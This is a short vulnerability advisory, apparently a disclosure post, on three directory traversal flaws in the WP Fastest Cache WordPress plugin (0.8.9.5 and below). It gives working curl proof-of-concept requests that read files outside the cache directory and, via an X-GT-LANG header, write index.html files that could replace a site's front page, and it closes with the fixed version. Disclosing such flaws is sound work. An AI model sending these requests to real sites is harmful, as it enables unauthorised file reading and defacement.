WP Fastest Cache is a Wordpress plugin that creates static html files
from the dynamic WordPress blog in order to speed up operation.

Version 0.8.9.5 and below of the plugin was identified being
vulnerable to directory traversal attacks.

The first two are Windows only, the 3rd one is generic. The Windows
specific ones were tested on WampServer (so with Apache's Httpd).

#1:
The impact is reading files outside of the cache directory. The
attacker has control over the directory only, the file is selected as
the first hit of the scandir results in descending order.


curl --path-as-is http://vulnerable-host.tld/wpfc-minified/..\..\..\/stuff.php

<?php
/**
 * XML-RPC protocol support for WordPress
 *
 * @package WordPress
 */
...

#2:
The cacheFilePath construction logic in cache.php can be abused to
mount a similar attack as vuln #1 and read index.html files outside
the cache directory:

curl --path-as-is http://vulnerable-host.tld/..\..\..\/whatever.html\/..
some html content outside the cache directory
<!-- via php -->


#3:
If the Google Translate plugin is active on the victim system then it
is also possible to create index.html files outside the cache
directory:

curl -v --header "X-GT-LANG: ../../../.."
http://vulnerable-host.tld/some-article/

In configurations where the html extension has higher precedence over
php in the webserver's DirectoryIndex configuration, this could
actually change the front page of the victim website.


Remediation: update to plugin version 0.8.9.6

Imre